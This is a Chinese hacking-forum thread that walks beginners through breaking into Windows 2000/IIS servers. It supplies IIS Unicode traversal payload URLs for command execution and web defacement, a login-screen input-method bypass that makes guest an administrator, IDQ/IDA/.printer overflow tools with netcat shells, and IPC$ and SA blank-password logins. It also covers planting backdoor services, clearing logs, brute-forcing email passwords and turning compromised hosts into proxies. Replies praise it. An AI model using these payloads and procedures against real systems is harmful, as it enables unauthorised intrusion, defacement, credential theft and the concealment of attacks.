论坛: 菜鸟乐园 标题: UNICODE漏洞入侵!!送给菜鸟的 复制本贴地址    
作者: tianyecool [tianyecool]    论坛用户   登录
(1) UNICODE漏洞入侵 
“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。 
第一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围的。在第一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在第一个框里就填入192.168.0.1,在to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框,是要填入内容的如: 
/scripts/..%c0%af../winnt/system32/cmd.exe 
这句话的意思是扫描有 %c0%af 漏洞的机器,对象一般是英文的WIN2000机。 
我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了,如果你选的IP范围好,呵,很快在扫描结果框里就会显示扫到的漏洞主机 
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe 
意思是192.168.0.111主机有 %c0%af 漏洞, 
目标有了,我们马上打开浏览器。在网址栏里输入: 
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回车 
意思是查看机器里C盘的根目录。一般情况下,我们都可以在浏览器里看到类似如: 
Directory of c:\ 
2002-03-13 03:47p 289 default.asp 
2002-02-11 03:47p 289 default.htm 
2002-03-09 04:35p <DIR> Documents and Settings 
2002-02-11 03:47p 289 index.asp 
2002-02-11 03:47p 289 index.htm 
2002-05-08 05:19a <DIR> Inetpub 
2002-01-19 10:37p <DIR> MSSQL7 
2002-03-09 04:22p <DIR> Program Files 
2002-01-23 06:21p <DIR> WINNT 
4 File(s) 1,156 bytes 
5 Dir(s) 2,461,421,568 bytes free 
------------------------------ 
的目录列表。也会碰到看不到文件的空目录。 
好,我们成功看到了机器里的C盘了。 
我们在浏览器里输入: 
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车 
CGI Error 
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 

ALLUSERSPROFILE=C:\Documents and Settings\All Users 
CommonProgramFiles=C:\Program Files\Common Files 
COMPUTERNAME=ON 
ComSpec=C:\WINNT\system32\cmd.exe 
CONTENT_LENGTH=0 
GATEWAY_INTERFACE=CGI/1.1 
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* 
HTTP_ACCEPT_LANGUAGE=zh-cn 
HTTP_CONNECTION=Keep-Alive 
HTTP_HOST=192.168.0.111 
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90) 
HTTP_ACCEPT_ENCODING=gzip, deflate 
HTTPS=off 
INSTANCE_ID=1 
LOCAL_ADDR=192.168.0.111 
NUMBER_OF_PROCESSORS=1 
Os2LibPath=C:\WINNT\system32\os2\dll; 
OS=Windows_NT 
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN 
PATH_TRANSLATED=c:\inetpub\wwwroot 
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH 
PROCESSOR_ARCHITECTURE=x86 
PROCESSOR_IDENTIFIER=x86 Fa 
----------------- 
哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot 
意思是他的主页存放在c:\inetpub\wwwroot的目录里,知道就好办了。 
我们用命令: 
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回车 
我们就可以看到c:\inetpub\wwwroot目录里的文件了,一般都有default.asp, default.htm , index.htm, index.asp,等等。我们以目录里有index.asp做例子。 
我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。 
我们用命令: 
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回车 
当看到下面的英文 
CGI Error 
The specified CGI application misbehaved by not returning a complete 
set of HTTP headers. The headers it did return are: 
恭喜你,你可以改他的网页了。 
---------------------------------------- 
但如果你看到下面的英文就不成功,只好换其他机器了。 
CGI Error 
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 
Access denied - C:\inetpub\wwwroot\index.asp 
----------------------------- 
继续。现在用ECHO改网页的内容。 
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+网站有漏洞+> c:\inetpub\wwwroot\index.asp 回车 
当看到 
CGI Error 
The specified CGI application misbehaved by not returning a complete 
set of HTTP headers. The headers it did return are: 
的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。 

英文WIN2000 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
中文WIN2000 
/scripts/..%c0%2f../winnt/system32/cmd.exe 
/scripts/..%c1%1c../winnt/system32/cmd.exe 
WIN NT4 
/scripts/..%c1%9c../winnt/system32/cmd.exe 
英文WIN2000 
/scripts/..%c0%af../winnt/system32/cmd.exe 
通用代码:/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 

(2) Windows2000输入法漏洞 
先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。选择“帮助” ―― “输入法指南” ―― “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。)按右键,选择“跳转到URL”,输入:c:\winnt\system32在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性” ―“目标”―c:\winnt\system32\net.exe 后面空一格,填入“user guest /active :yes”。 点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。(此时你不会看到运行状态,但guest用户已被激活。)然后重复操作上面的,在 “属性” ―― “目标”―― c:\winnt\system32\net.exe 后面空一格,填入localgroup administrators guest /add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。现在,我们可以像操作本地主机一样,控制对方系统。 
(3) idq溢出漏洞 
要用到3个程序,一个Snake IIS IDQ 溢出程序GUI版本,一个扫描器,还有NC。 
首先扫描一台有IDQ漏洞的机器,然后设置Snake IIS IDQ 溢出程序,在被攻击IP地址后面写上对方的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作系统类型,随便选一个,我们选IIS5 English Win2k Sp0吧,点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了,然后我们用NC来连接。 
进入MS-DOS。进入“nc”的目录。然后:nc --v IP 813 
c:\>nc -vv IP 813 
IP: inverse host lookup failed: h_errno 11004: NO_DATA 
(UNKNOWN) [IP] 813 (?): connection refused 
sent 0, rcvd 0: NOTSOCK 
c:\> 

看来没成功. 别灰心,在来一次,换用IIS5 English Win2k Sp1试试。 
c:\>nc -vv IP 813 
IP: inverse host lookup failed: h_errno 11004: NO_DATA 
(UNKNOWN) [IP] 813 (?) open 
Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-2000 Microsoft Corp. 

C:\WINNT\system32> 
哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。 

(4)IDA溢出漏洞 
所用程序:idahack 
进入MS-DOS方式(假设idq.exe在c:\下) 
c:\idahack.exe 
运行参数:c:\idahack <host> <hostport> <hosttype> <shellport> 
chinese win2k  :  1 
chinese win2ksp1:  2 
chinese win2ksp2:  3 
english win2k  :  4 
english win2ksp1:  5 
english win2ksp2:  6 
japanese win2k :  7 
japanese win2ksp1:  8 
japanese win2ksp2:  9 
korea  win2k  :  10 
korea  win2ksp1:  11 
korea  win2ksp2:  12 
chinese nt sp5 :  13 
chinese nt sp6 :  14 

c:\idahack 127.0.0.1 80 1 80 
connecting... 
sending... 
Now you can telnet to 80 port 
Good luck ?; 
好,现在你可以telnet它的80端口了,我们用NC来连接。 
C:\nc 127.0.0.1 80 

Microsoft Windows 2000 [Version 5.00.2195] 
(C)版权所有 1985-1998 Microsoft Corp 
C:\WINNT\system32> 
OK,现在我们现在上来了,也可IDQ一样是SYSTEN权限,尽情的玩吧。 

(5).printer漏洞 
这个漏洞,我们用两个程序来入侵。iis5hack和nc。 
C:\>iis5hack 
iis5 remote .printer overflow. writen by sunx  http://www.sunx.org 
for test only, dont used to hack,  

usage: D:\IIS5HACK.EXE <Host> <HostPort> <HostType> <ShellPort> 
用法: D:\IIS5HACK <溢出的主机> <主机的端口> <主机的类型> <溢出的端口> 
chinese edition:   0 
chinese edition, sp1: 1 
english edition:   2 
english edition, sp1: 3 
japanese edition:   4 
japanese edition, sp1: 5 
korea edition:    6 
korea edition, sp1:  7 
mexico edition:   8 
mexico edition, sp1: 9 

c:\>iis5hack 127.0.0.19 80 1 119 
iis5 remote .printer overflow. writen by sunx 
 http://www.sunx.org 
 for test only, dont used to hack,  
Listn: 80 

connecting... 
sending... 
Now you can telnet to 3739 port 
good luck  

溢出成功! 
c:\>nc 127.0.0.19 119  http://www.sunx.org 

Microsoft Windows 2000 [Version 5.00.2195] 
(C) 版权所有 1985-2000 Microsoft Corp. 

C:\WINNT\system32> 

OK,我们又成功取得system权限!玩吧。 

(6)139端口入侵 
我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。 
用到两个NET命令,下面就是这两个命令的使用方法 
NET VIEW? 
作 用:显示域列表、计算机列表或指定计算机的共享资源列表。? 
命令格式:net view [\\computername | /domain[:domainname]? 
参数介绍:? 
<1>键入不带参数的net view显示当前域的计算机列表。? 
<2>\\computername 指定要查看其共享资源的计算机。? 
<3>/domain[:domainname]指定要查看其可用计算机的域? 

NET USE? 
作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。? 
命令格式:net use [devicename | *] [\\computername\sharename[\volume]? 
[password | *] [/user:[domainname\]username] [/delete] |? 
[/persistent:{yes | no]}? 
参数介绍:? 
键入不带参数的net use列出网络连接。? 
devicename指定要连接到的资源名称或要断开的设备名称。? 
\\computername\sharename服务器及共享资源的名称。? 
password访问共享资源的密码。? 
*提示键入密码。 /user指定进行连接的另外一个用户。? 
domainname指定另一个域。? 
username指定登录的用户名。? 
/home将用户连接到其宿主目录? 
/delete取消指定网络连接。? 
/persistent控制永久网络连接的使用。? 
C:\net use \\IP 
C:\net view \\IP 
我们已经看到对方共享了他的C,D,E三个盘 
我们要做的是使用NBTSTAT命令载入NBT快取. 
c:\>nbtstat �CR  载入NBT快取 
c:\>nbtstat �Cc  看有无载入NBT快取 
现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样。 

(7)IPC入侵 
所有程序:流光 
开始:在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。输入我们要破解的IP段,我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”,,扫描出结果以后,“IPC$主机”,选中后按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测” 
的窗体,把那两个选项都选了,然后点“选项” 为了加快弱口令扫描速度,这里的两个选项我们可以全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿,结果出来了。比如我们探测出了用户名为“admin”的管理员,密码为“admin”,现在我们用命令提示符,熟悉下命令吧,输入: 
net use file://对方ip/ipc$ "密码" /user:"用户名"  || 建立远程连接 
copy icmd.exe file://对方ip/admin$    || admin$是对方的winnt目录 
net time file://对方IP/         || 看看对方的本地时间 
at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数   || 用at命令来定时启动程序 
telnet 对方ip 端口 

我们也可以改网页: 
net use \\ip\ipc$ "admin" /uesr:"admin" 回车。 
出现“命令成功完成”。 
然后输入“dir \\ip\c$\*.*” 
看到C:下所有内容。现在我们来改主页。一般主页放在c:\inetpub\wwwroot里面 
输入“dir \\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或 default.asp.这些就是主页了,假如你黑页在C:下,就输入"copy 主页文件 \\ip\c$\inetpub\wwwroot"覆盖原文件这样就行了,简单吧? 

日志清除,断开连接 : 
 我们copy cl.exe ,clear.exe 上去,再执行,就可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use file://ip/ipc$ /delete 

(8)超管SA空密码漏洞 
使用的工具:流光IV 
启动流光,按Ctrl+R。出现扫描设置对话框,设置扫描IP段,并且选择扫描的类型为SQL。点击“确定”,进行扫描,假设我们取得主机:127.0.0.1,然后点击“工具” ―― SQL远程命令(或者Ctrl+Q),填入主机IP(127.0.0.1)、用户(sa)、密码(空)点击“连接”,出现远程命令行的界面。 
net user heiying heiying1 /add       填加一个heiying的帐号和密码heiying1 
net localgroup administrators heiying /add  将我们创建的heiying帐号填加到管理组。 
下面我们来做跳板: 
打开cmd.exe,输入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令 
显示命令成功完成。 
上传srv.exe: 
copy srv.exe \\127.0.0.1\admin$\system32 
上传ntlm.exe: 
copy ntlm.exe \\127.0.0.1\admin$\system32 
启动服务: 
首先用net time \\127.0.0.1 
看看对方主机的时间,(假如回显\\127.0.0.1 的本地时间是上午12.00),然后我们用at \\2127.0.0.1 12.01 srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。 
一分钟后在本机命令提示符中输入: 
telnet X.X.X.X 99 
然后我们要启动NTLM.exe: 
在telnet状态下直接输入ntlm回车。 
显示:windows 2000 telnet dump,by assassin,all rights reserved.done! 
然后从新启动对方主机的telnet服务:net stop telnet(先关闭telnet服务)再输入net start telnet(启动telnet服务)然后我们退出telnet,然后在命令行下输入telnet 127.0.0.1,依照提示,接着输入用户名:heiying,密码:heiying1,回车。这样,我们的跳板就做好了,简单吧? 
(上面上传的srv和ntlm等东东还有一个简便方法,全都可以直接用流光工具菜单里的种植者上传,60秒后自动运行,不用敲命令!呵呵~~~~方便吧!) 

(9)如何用流光破解信箱密码 
这次的目标是21CN,运行流光IV,选择POP3主机----右键----编辑----添加,填上:pop.21cn.com,其他的就用默认吧!不用更改,确定就行了。到下一步,还是右键-----从列表中添加------选择一个字典,没有的到网上下载一个字典,或者到黑白网络去下载,我们用简单模式探测!这样速度比较快,然后就等着成果吧,上次我以下就破了5个邮箱出来。 

(10)frontpage进行攻击 
打开您自己的Frontpage,文件菜单下选择“打开站点”,然后在文件夹框里写入http://127.0.0.1(http://不要漏掉)。按下“打开”按钮,一会后,出现了文件夹,成功了,现在就可以操作网页文件了。如果跳出错误信息,表示有密码,我们用以下http://127.0.0.1/_vti_pvt/service.pwd,这是默认的密码文件,下载下来,找个解密器破密码吧!破出来后就还可以改网页。这个只能改该网页,没什么玩的。 

(11)用肉鸡做SOCK5代理跳板 
需要软件:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。 
首先我们在命令提示符下建立IPC$管道: 
net use \\127.0.0.1\ipc$ "密码" /user:帐号 
通道建立好后,我们把srv.exe sss.exe ntlm.exe全部上传。 
c:\copy srv.exe \\10.10.10.10\admin$ 
1 files copied! 
c:\copy ntlm.exe \\10.10.10.10\admin$ 
1 files copied! 
c:\copy sss.exe \\10.10.10.10\admin$ 
1 files copied! 
复制完毕后, 
看肉鸡上现在的时间: 
c:\net time \\127.0.0.1 
显示当前时间是 2002/4/13 晚上 09:00 
我们来启动srv.exe 
c:\at \\127.0.0.1 09:01 srv.exe 
等到09:01后。我们来连接肉鸡: 
c:\telnet 127.0.0.1 99 
连上后显示: 
c:\winnt\system32> 
接着我们启动NTLM.exe 
c:\winnt\system32>ntlm 
显示: 
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. 
Done! 
C:\WINNT\system32> 
首先我们终止srv.exe的telnet服务: 
C:\WINNT\system32>net stop telnet 
继续: 
C:\WINNT\system32>net start telnet 
再启动TELNET。 
OK,我们来登陆 
c:>telnet 127.0.0.1 
*========================================================== 
Microsoft Telnet 
*========================================================== 
c:> 
好了,一切顺利,我们现在正式开始做代理: 
c:>sss.exe -install  <---------开始安装 
显示: 
c:>sksockserver installed! 
来看看配置: 
c:>sss -config show 
显示: 
SkServer Port = 1813   <----开放服务的端口 ,我们记着这个1813端口哦 
SkServer StartType: 3 - Manual     <---服务启动方式 
SkServer Enable Client Set Num:0    <---客户端的项目个数 
SkServer Pass SkServer Number:0    <---经过SkServer的项目个数 

来启动服务: 
c:>net start skserver 
提示你正在启动,并且完成。 
来检查一下是不是启动了: 
c:>net start            <-----------看看启动的服务列表 
These Windows 2000 services are started: 

Print Spooler 
Server 
Snake SockProxy Service <---------------就是它,呵呵! 
System Event Notification 
TCP/IP NetBIOS Helper Service 
Telephony 
Telnet 
The command completed successfully. 

c:>_ 
好了,到这里我们已经做好了一个socks5代理了,我们自己的哦.OK,下面我们用sockscap来使用我们做代理。 
安装好SocksCap后,我们在桌面上打开SocksCap V2,点开File选项选Settings...弹出卡片,在 SOCKS Server里面我们填肉鸡的IP:127.0.0.1,PortT填默认的1813端口,下面的我们选socks version 5,呵呵,和 Attempt local then remot,这是域名解析的顺序,先本地,然后才远程。设置完了点“确定”我们就可以使用了,添加应用程序到sockscap里面,点开那个"new"按钮,会弹出一个卡片, 
Profile name :程序名,随便写。 
Command Line: 命令行,点后面的Browse...找到你的程序路径 
Working:填好上面那个,这个就自动加上. 
这样我们就把程序加到SocksCap里面了。 
现在们可以双击里面的程序来使用,也可以选住程序在点"Run"来运行。 


地主 发表时间: 08/02 19:40

回复: kuangbiao [kuangbiao]   论坛用户   登录
用此漏洞入侵 怎么样才能的到最高权限呢
我有一台这样的肉鸡 装了后门 可就是不
能得到最高权限以至什么都不能干`~~ 郁闷


B1层 发表时间: 08/03 00:24

回复: rjmj [rjmj]   论坛用户   登录
不错不错,都是好东西,对我们有极大的帮助!值得一看啊!呵呵!
建议以后像这样的经典文章多发表一点!

B2层 发表时间: 08/03 07:37

回复: hacker521 [hacker521]   论坛用户   登录
申明一下,用UNICODE溢出的只是GUEST权限,而不是ADMIN权限,溢出后必须利用工具之类使自己的权限提升才可进行后面的操作,至于如何提高权限,论坛的文摘里已有详细叙述,我这里就不说了

B3层 发表时间: 08/03 07:46

回复: all528 [all528]   论坛用户   登录
晕 咱们现在还有那么多人问这个啊    说过好多次可以用IDQ提升权限啦  你们想累死我啊 5555555555555总是重复一句话

B4层 发表时间: 08/03 12:07

回复: hitler007 [hitler007]   论坛用户   登录
谢谢大哥,真是好东东啊,辛苦你了

B5层 发表时间: 08/03 14:51

回复: tianyecool [tianyecool]   论坛用户   登录
不过这样的漏洞现在很少见了

B6层 发表时间: 08/06 02:01

回复: all528 [all528]   论坛用户   登录
没关系 现在的尼姆达可以帮我们打开通往学习之路

B7层 发表时间: 08/06 07:42

回复: tianyecool [tianyecool]   论坛用户   登录


B8层 发表时间: 08/06 14:18

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号